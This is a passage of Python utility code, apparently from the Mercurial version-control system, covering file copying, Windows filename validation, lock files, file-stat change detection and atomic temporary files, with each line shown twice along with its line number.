1167 def nprog(t, pos):
1167 def nprog(t, pos):
1168 if pos is not None:
1168 if pos is not None:
1169 return progress(t, pos + num)
1169 return progress(t, pos + num)
1170 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1170 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1171 num += n
1171 num += n
1172 else:
1172 else:
1173 if hardlink is None:
1173 if hardlink is None:
1174 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1174 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1175 os.stat(os.path.dirname(dst)).st_dev)
1175 os.stat(os.path.dirname(dst)).st_dev)
1176 topic = gettopic()
1176 topic = gettopic()
1177
1177
1178 if hardlink:
1178 if hardlink:
1179 try:
1179 try:
1180 oslink(src, dst)
1180 oslink(src, dst)
1181 except (IOError, OSError):
1181 except (IOError, OSError):
1182 hardlink = False
1182 hardlink = False
1183 shutil.copy(src, dst)
1183 shutil.copy(src, dst)
1184 else:
1184 else:
1185 shutil.copy(src, dst)
1185 shutil.copy(src, dst)
1186 num += 1
1186 num += 1
1187 progress(topic, num)
1187 progress(topic, num)
1188 progress(topic, None)
1188 progress(topic, None)
1189
1189
1190 return hardlink, num
1190 return hardlink, num
1191
1191
1192 _winreservednames = b'''con prn aux nul
1192 _winreservednames = b'''con prn aux nul
1193 com1 com2 com3 com4 com5 com6 com7 com8 com9
1193 com1 com2 com3 com4 com5 com6 com7 com8 com9
1194 lpt1 lpt2 lpt3 lpt4 lpt5 lpt6 lpt7 lpt8 lpt9'''.split()
1194 lpt1 lpt2 lpt3 lpt4 lpt5 lpt6 lpt7 lpt8 lpt9'''.split()
1195 _winreservedchars = ':*?"<>|'
1195 _winreservedchars = ':*?"<>|'
1196 def checkwinfilename(path):
1196 def checkwinfilename(path):
1197 r'''Check that the base-relative path is a valid filename on Windows.
1197 r'''Check that the base-relative path is a valid filename on Windows.
1198 Returns None if the path is ok, or a UI string describing the problem.
1198 Returns None if the path is ok, or a UI string describing the problem.
1199
1199
1200 >>> checkwinfilename("just/a/normal/path")
1200 >>> checkwinfilename("just/a/normal/path")
1201 >>> checkwinfilename("foo/bar/con.xml")
1201 >>> checkwinfilename("foo/bar/con.xml")
1202 "filename contains 'con', which is reserved on Windows"
1202 "filename contains 'con', which is reserved on Windows"
1203 >>> checkwinfilename("foo/con.xml/bar")
1203 >>> checkwinfilename("foo/con.xml/bar")
1204 "filename contains 'con', which is reserved on Windows"
1204 "filename contains 'con', which is reserved on Windows"
1205 >>> checkwinfilename("foo/bar/xml.con")
1205 >>> checkwinfilename("foo/bar/xml.con")
1206 >>> checkwinfilename("foo/bar/AUX/bla.txt")
1206 >>> checkwinfilename("foo/bar/AUX/bla.txt")
1207 "filename contains 'AUX', which is reserved on Windows"
1207 "filename contains 'AUX', which is reserved on Windows"
1208 >>> checkwinfilename("foo/bar/bla:.txt")
1208 >>> checkwinfilename("foo/bar/bla:.txt")
1209 "filename contains ':', which is reserved on Windows"
1209 "filename contains ':', which is reserved on Windows"
1210 >>> checkwinfilename("foo/bar/b\07la.txt")
1210 >>> checkwinfilename("foo/bar/b\07la.txt")
1211 "filename contains '\\x07', which is invalid on Windows"
1211 "filename contains '\\x07', which is invalid on Windows"
1212 >>> checkwinfilename("foo/bar/bla ")
1212 >>> checkwinfilename("foo/bar/bla ")
1213 "filename ends with ' ', which is not allowed on Windows"
1213 "filename ends with ' ', which is not allowed on Windows"
1214 >>> checkwinfilename("../bar")
1214 >>> checkwinfilename("../bar")
1215 >>> checkwinfilename("foo\\")
1215 >>> checkwinfilename("foo\\")
1216 "filename ends with '\\', which is invalid on Windows"
1216 "filename ends with '\\', which is invalid on Windows"
1217 >>> checkwinfilename("foo\\/bar")
1217 >>> checkwinfilename("foo\\/bar")
1218 "directory name ends with '\\', which is invalid on Windows"
1218 "directory name ends with '\\', which is invalid on Windows"
1219 '''
1219 '''
1220 if path.endswith('\\'):
1220 if path.endswith('\\'):
1221 return _("filename ends with '\\', which is invalid on Windows")
1221 return _("filename ends with '\\', which is invalid on Windows")
1222 if '\\/' in path:
1222 if '\\/' in path:
1223 return _("directory name ends with '\\', which is invalid on Windows")
1223 return _("directory name ends with '\\', which is invalid on Windows")
1224 for n in path.replace('\\', '/').split('/'):
1224 for n in path.replace('\\', '/').split('/'):
1225 if not n:
1225 if not n:
1226 continue
1226 continue
1227 for c in _filenamebytestr(n):
1227 for c in _filenamebytestr(n):
1228 if c in _winreservedchars:
1228 if c in _winreservedchars:
1229 return _("filename contains '%s', which is reserved "
1229 return _("filename contains '%s', which is reserved "
1230 "on Windows") % c
1230 "on Windows") % c
1231 if ord(c) <= 31:
1231 if ord(c) <= 31:
1232 return _("filename contains %r, which is invalid "
1232 return _("filename contains %r, which is invalid "
1233 "on Windows") % c
1233 "on Windows") % c
1234 base = n.split('.')[0]
1234 base = n.split('.')[0]
1235 if base and base.lower() in _winreservednames:
1235 if base and base.lower() in _winreservednames:
1236 return _("filename contains '%s', which is reserved "
1236 return _("filename contains '%s', which is reserved "
1237 "on Windows") % base
1237 "on Windows") % base
1238 t = n[-1]
1238 t = n[-1]
1239 if t in '. ' and n not in '..':
1239 if t in '. ' and n not in '..':
1240 return _("filename ends with '%s', which is not allowed "
1240 return _("filename ends with '%s', which is not allowed "
1241 "on Windows") % t
1241 "on Windows") % t
1242
1242
1243 if pycompat.osname == 'nt':
1243 if pycompat.osname == 'nt':
1244 checkosfilename = checkwinfilename
1244 checkosfilename = checkwinfilename
1245 timer = time.clock
1245 timer = time.clock
1246 else:
1246 else:
1247 checkosfilename = platform.checkosfilename
1247 checkosfilename = platform.checkosfilename
1248 timer = time.time
1248 timer = time.time
1249
1249
1250 if safehasattr(time, "perf_counter"):
1250 if safehasattr(time, "perf_counter"):
1251 timer = time.perf_counter
1251 timer = time.perf_counter
1252
1252
1253 def makelock(info, pathname):
1253 def makelock(info, pathname):
1254 try:
1254 try:
1255 return os.symlink(info, pathname)
1255 return os.symlink(info, pathname)
1256 except OSError as why:
1256 except OSError as why:
1257 if why.errno == errno.EEXIST:
1257 if why.errno == errno.EEXIST:
1258 raise
1258 raise
1259 except AttributeError: # no symlink in os
1259 except AttributeError: # no symlink in os
1260 pass
1260 pass
1261
1261
1262 ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
1262 ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
1263 os.write(ld, info)
1263 os.write(ld, info)
1264 os.close(ld)
1264 os.close(ld)
1265
1265
1266 def readlock(pathname):
1266 def readlock(pathname):
1267 try:
1267 try:
1268 return os.readlink(pathname)
1268 return os.readlink(pathname)
1269 except OSError as why:
1269 except OSError as why:
1270 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1270 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1271 raise
1271 raise
1272 except AttributeError: # no symlink in os
1272 except AttributeError: # no symlink in os
1273 pass
1273 pass
1274 fp = posixfile(pathname)
1274 fp = posixfile(pathname)
1275 r = fp.read()
1275 r = fp.read()
1276 fp.close()
1276 fp.close()
1277 return r
1277 return r
1278
1278
1279 def fstat(fp):
1279 def fstat(fp):
1280 '''stat file object that may not have fileno method.'''
1280 '''stat file object that may not have fileno method.'''
1281 try:
1281 try:
1282 return os.fstat(fp.fileno())
1282 return os.fstat(fp.fileno())
1283 except AttributeError:
1283 except AttributeError:
1284 return os.stat(fp.name)
1284 return os.stat(fp.name)
1285
1285
1286 # File system features
1286 # File system features
1287
1287
1288 def fscasesensitive(path):
1288 def fscasesensitive(path):
1289 """
1289 """
1290 Return true if the given path is on a case-sensitive filesystem
1290 Return true if the given path is on a case-sensitive filesystem
1291
1291
1292 Requires a path (like /foo/.hg) ending with a foldable final
1292 Requires a path (like /foo/.hg) ending with a foldable final
1293 directory component.
1293 directory component.
1294 """
1294 """
1295 s1 = os.lstat(path)
1295 s1 = os.lstat(path)
1296 d, b = os.path.split(path)
1296 d, b = os.path.split(path)
1297 b2 = b.upper()
1297 b2 = b.upper()
1298 if b == b2:
1298 if b == b2:
1299 b2 = b.lower()
1299 b2 = b.lower()
1300 if b == b2:
1300 if b == b2:
1301 return True # no evidence against case sensitivity
1301 return True # no evidence against case sensitivity
1302 p2 = os.path.join(d, b2)
1302 p2 = os.path.join(d, b2)
1303 try:
1303 try:
1304 s2 = os.lstat(p2)
1304 s2 = os.lstat(p2)
1305 if s2 == s1:
1305 if s2 == s1:
1306 return False
1306 return False
1307 return True
1307 return True
1308 except OSError:
1308 except OSError:
1309 return True
1309 return True
1310
1310
1311 try:
1311 try:
1312 import re2
1312 import re2
1313 _re2 = None
1313 _re2 = None
1314 except ImportError:
1314 except ImportError:
1315 _re2 = False
1315 _re2 = False
1316
1316
1317 class _re(object):
1317 class _re(object):
1318 def _checkre2(self):
1318 def _checkre2(self):
1319 global _re2
1319 global _re2
1320 try:
1320 try:
1321 # check if match works, see issue3964
1321 # check if match works, see issue3964
1322 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1322 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1323 except ImportError:
1323 except ImportError:
1324 _re2 = False
1324 _re2 = False
1325
1325
1326 def compile(self, pat, flags=0):
1326 def compile(self, pat, flags=0):
1327 '''Compile a regular expression, using re2 if possible
1327 '''Compile a regular expression, using re2 if possible
1328
1328
1329 For best performance, use only re2-compatible regexp features. The
1329 For best performance, use only re2-compatible regexp features. The
1330 only flags from the re module that are re2-compatible are
1330 only flags from the re module that are re2-compatible are
1331 IGNORECASE and MULTILINE.'''
1331 IGNORECASE and MULTILINE.'''
1332 if _re2 is None:
1332 if _re2 is None:
1333 self._checkre2()
1333 self._checkre2()
1334 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1334 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1335 if flags & remod.IGNORECASE:
1335 if flags & remod.IGNORECASE:
1336 pat = '(?i)' + pat
1336 pat = '(?i)' + pat
1337 if flags & remod.MULTILINE:
1337 if flags & remod.MULTILINE:
1338 pat = '(?m)' + pat
1338 pat = '(?m)' + pat
1339 try:
1339 try:
1340 return re2.compile(pat)
1340 return re2.compile(pat)
1341 except re2.error:
1341 except re2.error:
1342 pass
1342 pass
1343 return remod.compile(pat, flags)
1343 return remod.compile(pat, flags)
1344
1344
1345 @propertycache
1345 @propertycache
1346 def escape(self):
1346 def escape(self):
1347 '''Return the version of escape corresponding to self.compile.
1347 '''Return the version of escape corresponding to self.compile.
1348
1348
1349 This is imperfect because whether re2 or re is used for a particular
1349 This is imperfect because whether re2 or re is used for a particular
1350 function depends on the flags, etc, but it's the best we can do.
1350 function depends on the flags, etc, but it's the best we can do.
1351 '''
1351 '''
1352 global _re2
1352 global _re2
1353 if _re2 is None:
1353 if _re2 is None:
1354 self._checkre2()
1354 self._checkre2()
1355 if _re2:
1355 if _re2:
1356 return re2.escape
1356 return re2.escape
1357 else:
1357 else:
1358 return remod.escape
1358 return remod.escape
1359
1359
1360 re = _re()
1360 re = _re()
1361
1361
1362 _fspathcache = {}
1362 _fspathcache = {}
1363 def fspath(name, root):
1363 def fspath(name, root):
1364 '''Get name in the case stored in the filesystem
1364 '''Get name in the case stored in the filesystem
1365
1365
1366 The name should be relative to root, and be normcase-ed for efficiency.
1366 The name should be relative to root, and be normcase-ed for efficiency.
1367
1367
1368 Note that this function is unnecessary, and should not be
1368 Note that this function is unnecessary, and should not be
1369 called, for case-sensitive filesystems (simply because it's expensive).
1369 called, for case-sensitive filesystems (simply because it's expensive).
1370
1370
1371 The root should be normcase-ed, too.
1371 The root should be normcase-ed, too.
1372 '''
1372 '''
1373 def _makefspathcacheentry(dir):
1373 def _makefspathcacheentry(dir):
1374 return dict((normcase(n), n) for n in os.listdir(dir))
1374 return dict((normcase(n), n) for n in os.listdir(dir))
1375
1375
1376 seps = pycompat.ossep
1376 seps = pycompat.ossep
1377 if pycompat.osaltsep:
1377 if pycompat.osaltsep:
1378 seps = seps + pycompat.osaltsep
1378 seps = seps + pycompat.osaltsep
1379 # Protect backslashes. This gets silly very quickly.
1379 # Protect backslashes. This gets silly very quickly.
1380 seps.replace('\\','\\\\')
1380 seps.replace('\\','\\\\')
1381 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1381 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1382 dir = os.path.normpath(root)
1382 dir = os.path.normpath(root)
1383 result = []
1383 result = []
1384 for part, sep in pattern.findall(name):
1384 for part, sep in pattern.findall(name):
1385 if sep:
1385 if sep:
1386 result.append(sep)
1386 result.append(sep)
1387 continue
1387 continue
1388
1388
1389 if dir not in _fspathcache:
1389 if dir not in _fspathcache:
1390 _fspathcache[dir] = _makefspathcacheentry(dir)
1390 _fspathcache[dir] = _makefspathcacheentry(dir)
1391 contents = _fspathcache[dir]
1391 contents = _fspathcache[dir]
1392
1392
1393 found = contents.get(part)
1393 found = contents.get(part)
1394 if not found:
1394 if not found:
1395 # retry "once per directory" per "dirstate.walk" which
1395 # retry "once per directory" per "dirstate.walk" which
1396 # may take place for each patches of "hg qpush", for example
1396 # may take place for each patches of "hg qpush", for example
1397 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1397 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1398 found = contents.get(part)
1398 found = contents.get(part)
1399
1399
1400 result.append(found or part)
1400 result.append(found or part)
1401 dir = os.path.join(dir, part)
1401 dir = os.path.join(dir, part)
1402
1402
1403 return ''.join(result)
1403 return ''.join(result)
1404
1404
1405 def getfstype(dirpath):
1405 def getfstype(dirpath):
1406 '''Get the filesystem type name from a directory (best-effort)
1406 '''Get the filesystem type name from a directory (best-effort)
1407
1407
1408 Returns None if we are unsure. Raises OSError on ENOENT, EPERM, etc.
1408 Returns None if we are unsure. Raises OSError on ENOENT, EPERM, etc.
1409 '''
1409 '''
1410 return getattr(osutil, 'getfstype', lambda x: None)(dirpath)
1410 return getattr(osutil, 'getfstype', lambda x: None)(dirpath)
1411
1411
1412 def checknlink(testfile):
1412 def checknlink(testfile):
1413 '''check whether hardlink count reporting works properly'''
1413 '''check whether hardlink count reporting works properly'''
1414
1414
1415 # testfile may be open, so we need a separate file for checking to
1415 # testfile may be open, so we need a separate file for checking to
1416 # work around issue2543 (or testfile may get lost on Samba shares)
1416 # work around issue2543 (or testfile may get lost on Samba shares)
1417 f1 = testfile + ".hgtmp1"
1417 f1 = testfile + ".hgtmp1"
1418 if os.path.lexists(f1):
1418 if os.path.lexists(f1):
1419 return False
1419 return False
1420 try:
1420 try:
1421 posixfile(f1, 'w').close()
1421 posixfile(f1, 'w').close()
1422 except IOError:
1422 except IOError:
1423 try:
1423 try:
1424 os.unlink(f1)
1424 os.unlink(f1)
1425 except OSError:
1425 except OSError:
1426 pass
1426 pass
1427 return False
1427 return False
1428
1428
1429 f2 = testfile + ".hgtmp2"
1429 f2 = testfile + ".hgtmp2"
1430 fd = None
1430 fd = None
1431 try:
1431 try:
1432 oslink(f1, f2)
1432 oslink(f1, f2)
1433 # nlinks() may behave differently for files on Windows shares if
1433 # nlinks() may behave differently for files on Windows shares if
1434 # the file is open.
1434 # the file is open.
1435 fd = posixfile(f2)
1435 fd = posixfile(f2)
1436 return nlinks(f2) > 1
1436 return nlinks(f2) > 1
1437 except OSError:
1437 except OSError:
1438 return False
1438 return False
1439 finally:
1439 finally:
1440 if fd is not None:
1440 if fd is not None:
1441 fd.close()
1441 fd.close()
1442 for f in (f1, f2):
1442 for f in (f1, f2):
1443 try:
1443 try:
1444 os.unlink(f)
1444 os.unlink(f)
1445 except OSError:
1445 except OSError:
1446 pass
1446 pass
1447
1447
1448 def endswithsep(path):
1448 def endswithsep(path):
1449 '''Check path ends with os.sep or os.altsep.'''
1449 '''Check path ends with os.sep or os.altsep.'''
1450 return (path.endswith(pycompat.ossep)
1450 return (path.endswith(pycompat.ossep)
1451 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1451 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1452
1452
1453 def splitpath(path):
1453 def splitpath(path):
1454 '''Split path by os.sep.
1454 '''Split path by os.sep.
1455 Note that this function does not use os.altsep because this is
1455 Note that this function does not use os.altsep because this is
1456 an alternative of simple "xxx.split(os.sep)".
1456 an alternative of simple "xxx.split(os.sep)".
1457 It is recommended to use os.path.normpath() before using this
1457 It is recommended to use os.path.normpath() before using this
1458 function if need.'''
1458 function if need.'''
1459 return path.split(pycompat.ossep)
1459 return path.split(pycompat.ossep)
1460
1460
1461 def gui():
1461 def gui():
1462 '''Are we running in a GUI?'''
1462 '''Are we running in a GUI?'''
1463 if pycompat.sysplatform == 'darwin':
1463 if pycompat.sysplatform == 'darwin':
1464 if 'SSH_CONNECTION' in encoding.environ:
1464 if 'SSH_CONNECTION' in encoding.environ:
1465 # handle SSH access to a box where the user is logged in
1465 # handle SSH access to a box where the user is logged in
1466 return False
1466 return False
1467 elif getattr(osutil, 'isgui', None):
1467 elif getattr(osutil, 'isgui', None):
1468 # check if a CoreGraphics session is available
1468 # check if a CoreGraphics session is available
1469 return osutil.isgui()
1469 return osutil.isgui()
1470 else:
1470 else:
1471 # pure build; use a safe default
1471 # pure build; use a safe default
1472 return True
1472 return True
1473 else:
1473 else:
1474 return pycompat.osname == "nt" or encoding.environ.get("DISPLAY")
1474 return pycompat.osname == "nt" or encoding.environ.get("DISPLAY")
1475
1475
1476 def mktempcopy(name, emptyok=False, createmode=None):
1476 def mktempcopy(name, emptyok=False, createmode=None):
1477 """Create a temporary file with the same contents from name
1477 """Create a temporary file with the same contents from name
1478
1478
1479 The permission bits are copied from the original file.
1479 The permission bits are copied from the original file.
1480
1480
1481 If the temporary file is going to be truncated immediately, you
1481 If the temporary file is going to be truncated immediately, you
1482 can use emptyok=True as an optimization.
1482 can use emptyok=True as an optimization.
1483
1483
1484 Returns the name of the temporary file.
1484 Returns the name of the temporary file.
1485 """
1485 """
1486 d, fn = os.path.split(name)
1486 d, fn = os.path.split(name)
1487 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, dir=d)
1487 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, dir=d)
1488 os.close(fd)
1488 os.close(fd)
1489 # Temporary files are created with mode 0600, which is usually not
1489 # Temporary files are created with mode 0600, which is usually not
1490 # what we want. If the original file already exists, just copy
1490 # what we want. If the original file already exists, just copy
1491 # its mode. Otherwise, manually obey umask.
1491 # its mode. Otherwise, manually obey umask.
1492 copymode(name, temp, createmode)
1492 copymode(name, temp, createmode)
1493 if emptyok:
1493 if emptyok:
1494 return temp
1494 return temp
1495 try:
1495 try:
1496 try:
1496 try:
1497 ifp = posixfile(name, "rb")
1497 ifp = posixfile(name, "rb")
1498 except IOError as inst:
1498 except IOError as inst:
1499 if inst.errno == errno.ENOENT:
1499 if inst.errno == errno.ENOENT:
1500 return temp
1500 return temp
1501 if not getattr(inst, 'filename', None):
1501 if not getattr(inst, 'filename', None):
1502 inst.filename = name
1502 inst.filename = name
1503 raise
1503 raise
1504 ofp = posixfile(temp, "wb")
1504 ofp = posixfile(temp, "wb")
1505 for chunk in filechunkiter(ifp):
1505 for chunk in filechunkiter(ifp):
1506 ofp.write(chunk)
1506 ofp.write(chunk)
1507 ifp.close()
1507 ifp.close()
1508 ofp.close()
1508 ofp.close()
1509 except: # re-raises
1509 except: # re-raises
1510 try: os.unlink(temp)
1510 try: os.unlink(temp)
1511 except OSError: pass
1511 except OSError: pass
1512 raise
1512 raise
1513 return temp
1513 return temp
1514
1514
1515 class filestat(object):
1515 class filestat(object):
1516 """help to exactly detect change of a file
1516 """help to exactly detect change of a file
1517
1517
1518 'stat' attribute is result of 'os.stat()' if specified 'path'
1518 'stat' attribute is result of 'os.stat()' if specified 'path'
1519 exists. Otherwise, it is None. This can avoid preparative
1519 exists. Otherwise, it is None. This can avoid preparative
1520 'exists()' examination on client side of this class.
1520 'exists()' examination on client side of this class.
1521 """
1521 """
1522 def __init__(self, stat):
1522 def __init__(self, stat):
1523 self.stat = stat
1523 self.stat = stat
1524
1524
1525 @classmethod
1525 @classmethod
1526 def frompath(cls, path):
1526 def frompath(cls, path):
1527 try:
1527 try:
1528 stat = os.stat(path)
1528 stat = os.stat(path)
1529 except OSError as err:
1529 except OSError as err:
1530 if err.errno != errno.ENOENT:
1530 if err.errno != errno.ENOENT:
1531 raise
1531 raise
1532 stat = None
1532 stat = None
1533 return cls(stat)
1533 return cls(stat)
1534
1534
1535 @classmethod
1535 @classmethod
1536 def fromfp(cls, fp):
1536 def fromfp(cls, fp):
1537 stat = os.fstat(fp.fileno())
1537 stat = os.fstat(fp.fileno())
1538 return cls(stat)
1538 return cls(stat)
1539
1539
1540 __hash__ = object.__hash__
1540 __hash__ = object.__hash__
1541
1541
1542 def __eq__(self, old):
1542 def __eq__(self, old):
1543 try:
1543 try:
1544 # if ambiguity between stat of new and old file is
1544 # if ambiguity between stat of new and old file is
1545 # avoided, comparison of size, ctime and mtime is enough
1545 # avoided, comparison of size, ctime and mtime is enough
1546 # to exactly detect change of a file regardless of platform
1546 # to exactly detect change of a file regardless of platform
1547 return (self.stat.st_size == old.stat.st_size and
1547 return (self.stat.st_size == old.stat.st_size and
1548 self.stat.st_ctime == old.stat.st_ctime and
1548 self.stat.st_ctime == old.stat.st_ctime and
1549 self.stat.st_mtime == old.stat.st_mtime)
1549 self.stat.st_mtime == old.stat.st_mtime)
1550 except AttributeError:
1550 except AttributeError:
1551 pass
1551 pass
1552 try:
1552 try:
1553 return self.stat is None and old.stat is None
1553 return self.stat is None and old.stat is None
1554 except AttributeError:
1554 except AttributeError:
1555 return False
1555 return False
1556
1556
1557 def isambig(self, old):
1557 def isambig(self, old):
1558 """Examine whether new (= self) stat is ambiguous against old one
1558 """Examine whether new (= self) stat is ambiguous against old one
1559
1559
1560 "S[N]" below means stat of a file at N-th change:
1560 "S[N]" below means stat of a file at N-th change:
1561
1561
1562 - S[n-1].ctime < S[n].ctime: can detect change of a file
1562 - S[n-1].ctime < S[n].ctime: can detect change of a file
1563 - S[n-1].ctime == S[n].ctime
1563 - S[n-1].ctime == S[n].ctime
1564 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1564 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1565 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1565 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1566 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1566 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1567 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1567 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1568
1568
1569 Case (*2) above means that a file was changed twice or more at
1569 Case (*2) above means that a file was changed twice or more at
1570 same time in sec (= S[n-1].ctime), and comparison of timestamp
1570 same time in sec (= S[n-1].ctime), and comparison of timestamp
1571 is ambiguous.
1571 is ambiguous.
1572
1572
1573 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
1573 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
1574 timestamp is ambiguous".
1574 timestamp is ambiguous".
1575
1575
1576 But advancing mtime only in case (*2) doesn't work as
1576 But advancing mtime only in case (*2) doesn't work as
1577 expected, because naturally advanced S[n].mtime in case (*1)
1577 expected, because naturally advanced S[n].mtime in case (*1)
1578 might be equal to manually advanced S[n-1 or earlier].mtime.
1578 might be equal to manually advanced S[n-1 or earlier].mtime.
1579
1579
1580 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1580 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1581 treated as ambiguous regardless of mtime, to avoid overlooking
1581 treated as ambiguous regardless of mtime, to avoid overlooking
1582 by confliction between such mtime.
1582 by confliction between such mtime.
1583
1583
1584 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1584 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1585 S[n].mtime", even if size of a file isn't changed.
1585 S[n].mtime", even if size of a file isn't changed.
1586 """
1586 """
1587 try:
1587 try:
1588 return (self.stat.st_ctime == old.stat.st_ctime)
1588 return (self.stat.st_ctime == old.stat.st_ctime)
1589 except AttributeError:
1589 except AttributeError:
1590 return False
1590 return False
1591
1591
1592 def avoidambig(self, path, old):
1592 def avoidambig(self, path, old):
1593 """Change file stat of specified path to avoid ambiguity
1593 """Change file stat of specified path to avoid ambiguity
1594
1594
1595 'old' should be previous filestat of 'path'.
1595 'old' should be previous filestat of 'path'.
1596
1596
1597 This skips avoiding ambiguity, if a process doesn't have
1597 This skips avoiding ambiguity, if a process doesn't have
1598 appropriate privileges for 'path'. This returns False in this
1598 appropriate privileges for 'path'. This returns False in this
1599 case.
1599 case.
1600
1600
1601 Otherwise, this returns True, as "ambiguity is avoided".
1601 Otherwise, this returns True, as "ambiguity is avoided".
1602 """
1602 """
1603 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
1603 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
1604 try:
1604 try:
1605 os.utime(path, (advanced, advanced))
1605 os.utime(path, (advanced, advanced))
1606 except OSError as inst:
1606 except OSError as inst:
1607 if inst.errno == errno.EPERM:
1607 if inst.errno == errno.EPERM:
1608 # utime() on the file created by another user causes EPERM,
1608 # utime() on the file created by another user causes EPERM,
1609 # if a process doesn't have appropriate privileges
1609 # if a process doesn't have appropriate privileges
1610 return False
1610 return False
1611 raise
1611 raise
1612 return True
1612 return True
1613
1613
1614 def __ne__(self, other):
1614 def __ne__(self, other):
1615 return not self == other
1615 return not self == other
1616
1616
1617 class atomictempfile(object):
1617 class atomictempfile(object):
1618 '''writable file object that atomically updates a file
1618 '''writable file object that atomically updates a file
1619
1619
1620 All writes will go to a temporary copy of the original file. Call
1620 All writes will go to a temporary copy of the original file. Call
1621 close() when you are done writing, and atomictempfile will rename
1621 close() when you are done writing, and atomictempfile will rename
1622 the temporary copy to the original name, making the changes
1622 the temporary copy to the original name, making the changes
1623 visible. If the object is destroyed without being closed, all your
1623 visible. If the object is destroyed without being closed, all your
1624 writes are discarded.
1624 writes are discarded.
1625
1625
1626 checkambig argument of constructor is used with filestat, and is
1626 checkambig argument of constructor is used with filestat, and is
1627 useful only if target file is guarded by any lock (e.g. repo.lock
1627 useful only if target file is guarded by any lock (e.g. repo.lock
1628 or repo.wlock).
1628 or repo.wlock).
1629 '''
1629 '''
1630 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
1630 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
1631 self.__name = name # permanent name
1631 self.__name = name # permanent name
1632 self._tempname = mktempcopy(name, emptyok=('w' in mode),
1632 self._tempname = mktempcopy(name, emptyok=('w' in mode),
1633 createmode=createmode)
1633 createmode=createmode)
1634 self._fp = posixfile(self._tempname, mode)
1634 self._fp = posixfile(self._tempname, mode)
1635 self._checkambig = checkambig
1635 self._checkambig = checkambig
1636
1636
1637 # delegated methods
1637 # delegated methods
1638 self.read = self._fp.read
1638 self.read = self._fp.read
1639 self.write = self._fp.write
1639 self.write = self._fp.write
1640 self.seek = self._fp.seek
1640 self.seek = self._fp.seek
1641 self.tell = self._fp.tell
1641 self.tell = self._fp.tell
1642 self.fileno = self._fp.fileno
1642 self.fileno = self._fp.fileno
1643
1643
1644 def close(self):
1644 def close(self):
1645 if not self._fp.closed:
1645 if not self._fp.closed:
1646 self._fp.close()
1646 self._fp.close()
1647 filename = localpath(self.__name)
1647 filename = localpath(self.__name)
1648 oldstat = self._checkambig and filestat.frompath(filename)
1648 oldstat = self._checkambig and filestat.frompath(filename)
1649 if oldstat and oldstat.stat:
1649 if oldstat and oldstat.stat:
1650 rename(self._tempname, filename)
1650 rename(self._tempname, filename)
1651 newstat = filestat.frompath(filename)
1651 newstat = filestat.frompath(filename)
1652 if newstat.isambig(oldstat):
1652 if newstat.isambig(oldstat):
1653 # stat of changed file is ambiguous to original one
1653 # stat of changed file is ambiguous to original one
1654 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1654 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1655 os.utime(filename, (advanced, advanced))
1655 os.utime(filename, (advanced, advanced))
1656 else:
1656 else:
1657 rename(self._tempname, filename)
1657 rename(self._tempname, filename)
1658
1658
1659 def discard(self):
1659 def discard(self):
1660 if not self._fp.closed:
1660 if not self._fp.closed:
1661 try:
1661 try:
1662 os.unlink(self._tempname)
1662 os.unlink(self._tempname)
1663 except OSError:
1663 except OSError:
1664 pass
1664 pass
1665 self._fp.close()
1665 self._fp.close()
1666
1666
1667 def __del__(self):
1667 def __del__(self):
1668 if safehasattr(self, '_fp'): # constructor actually did something
1668 if safehasattr(self, '_fp'): # constructor actually did something
1669 self.discard()
1669 self.discard()
1670
1670
1671 def __enter__(self):
1671 def __enter__(self):
1672 return self
1672 return self
1673
1673
1674 def __exit__(self, exctype, excvalue, traceback):
1674 def __exit__(self, exctype, excvalue, traceback):
1675 if exctype is not None:
1675 if exctype is not None:
1676 self.discard()
1676 self.discard()
1677 else:
1677 else:
1678 self.close()
1678 self.close()
1679
1679
1680 def unlinkpath(f, ignoremissing=False):
1680 def unlinkpath(f, ignoremissing=False):
1681 """unlink and remove the directory if it is empty"""
1681 """unlink and remove the directory if it is empty"""
1682 if ignoremissing:
1682 if ignoremissing:
1683 tryunlink(f)
1683 tryunlink(f)
1684 else:
1684 else:
1685 unlink(f)
1685 unlink(f)
1686 # try removing directories that might now be empty
1686 # try removing directories that might now be empty
1687 try:
1687 try:
1688 removedirs(os.path.dirname(f))
1688 removedirs(os.path.dirname(f))
1689 except OSError:
1689 except OSError:
1690 pass
1690 pass
1691
1691
